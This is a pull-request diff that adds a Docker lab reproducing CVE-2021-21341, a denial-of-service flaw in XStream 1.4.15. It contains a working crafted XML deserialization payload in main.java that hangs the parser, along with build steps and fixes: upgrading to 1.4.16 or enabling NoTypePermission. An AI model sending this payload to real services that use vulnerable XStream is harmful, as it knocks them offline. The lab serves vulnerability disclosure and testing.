Merge pull request #1 from s-index/master

Add CVE-2021-21341 XStream DoS

CVE-2021-21341/Dockerfile

@@ -0,0 +1,6 @@
+FROM maven:3.8.1-amazoncorretto-8
+
+WORKDIR /tmp
+COPY ./ /tmp/
+RUN mvn package
+CMD ["java","-jar","target/xstream-1.0-SNAPSHOT.jar"]

CVE-2021-21341/README.md

@@ -0,0 +1,59 @@
+# CVE-2021-21341 XStream DoS
+
+## XStream Official Announcement
+
+[CVE-2021-21341](https://x-stream.github.io/CVE-2021-21341.html)
+
+All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+## Docker Demo
+
+![cve-2021-21341](https://user-images.githubusercontent.com/56715563/116986789-31fe6a80-ad09-11eb-8d97-d15702601606.gif)
+
+## Set Up XStream Environment & PoC Execution
+
+1. Build an image from a Dockerfile (Set Up)
+
+```
+$ docker build -t cve-2021-21341 .
+```
+
+2. Run java -jar xstream in a new container (PoC Execution)
+
+```
+$ docker run -it --rm cve-2021-21341
+```
+
+## Output
+
+```
+Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
+
+(never end)
+```
+
+## Solution
+
+- Update xstream version to 1.4.16 or higher
+
+Change pom.xml to bellow
+
+```
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+            <version>1.4.16</version>
+        </dependency>
+```
+
+- Use XStream's security framework
+
+Add NoTypePermission.NONE
+
+```
+import com.thoughtworks.xstream.security.NoTypePermission; // Add
+
+XStream xstream = new XStream();
+xstream.addPermission(NoTypePermission.NONE); // Add
+xstream.fromXML(xml);
+```

CVE-2021-21341/pom.xml

@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <groupId>org.example</groupId>
+    <artifactId>xstream</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <dependencies>
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+            <version>1.4.15</version>
+        </dependency>
+    </dependencies>
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+    </properties>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-shade-plugin</artifactId>
+                <version>3.2.4</version>
+                <configuration>
+                <transformers>
+                    <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
+                    <mainClass>main</mainClass>
+                    </transformer>
+                </transformers>
+                </configuration>
+                <executions>
+                    <execution>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>shade</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+</project>

CVE-2021-21341/src/main/java/main.java

@@ -0,0 +1,37 @@
+import com.thoughtworks.xstream.XStream;
+
+public class main {
+    public static void main(String args[]){
+
+        String xml =
+                "<java.util.PriorityQueue serialization='custom'>\n" +
+                        "  <unserializable-parents/>\n" +
+                        "  <java.util.PriorityQueue>\n" +
+                        "    <default>\n" +
+                        "      <size>2</size>\n" +
+                        "      <comparator class='javafx.collections.ObservableList$1'/>\n" +
+                        "    </default>\n" +
+                        "    <int>3</int>\n" +
+                        "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
+                        "      <dataHandler>\n" +
+                        "        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
+                        "          <is class='java.io.ByteArrayInputStream'>\n" +
+                        "            <buf></buf>\n" +
+                        "            <pos>-2147483648</pos>\n" +
+                        "            <mark>0</mark>\n" +
+                        "            <count>0</count>\n" +
+                        "          </is>\n" +
+                        "          <consumed>false</consumed>\n" +
+                        "        </dataSource>\n" +
+                        "        <transferFlavors/>\n" +
+                        "      </dataHandler>\n" +
+                        "      <dataLen>0</dataLen>\n" +
+                        "    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
+                        "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\n" +
+                        "  </java.util.PriorityQueue>\n" +
+                        "</java.util.PriorityQueue>";
+
+        XStream xstream = new XStream();
+        xstream.fromXML(xml);
+    }
+}

README.md

@@ -5,3 +5,9 @@
 ![mac-demo](https://user-images.githubusercontent.com/56715563/100495858-d3015c00-3192-11eb-8813-46f94fa4f9c4.gif)
 
 [CVE-2020-13957 Apache Solr RCE](CVE-2020-13957)
+
+## CVE-2021-21341 XStream DoS
+
+![CVE-2021-21341](https://user-images.githubusercontent.com/56715563/116986789-31fe6a80-ad09-11eb-8d97-d15702601606.gif)
+
+[CVE-2021-21341 XStream DoS](CVE-2021-21341)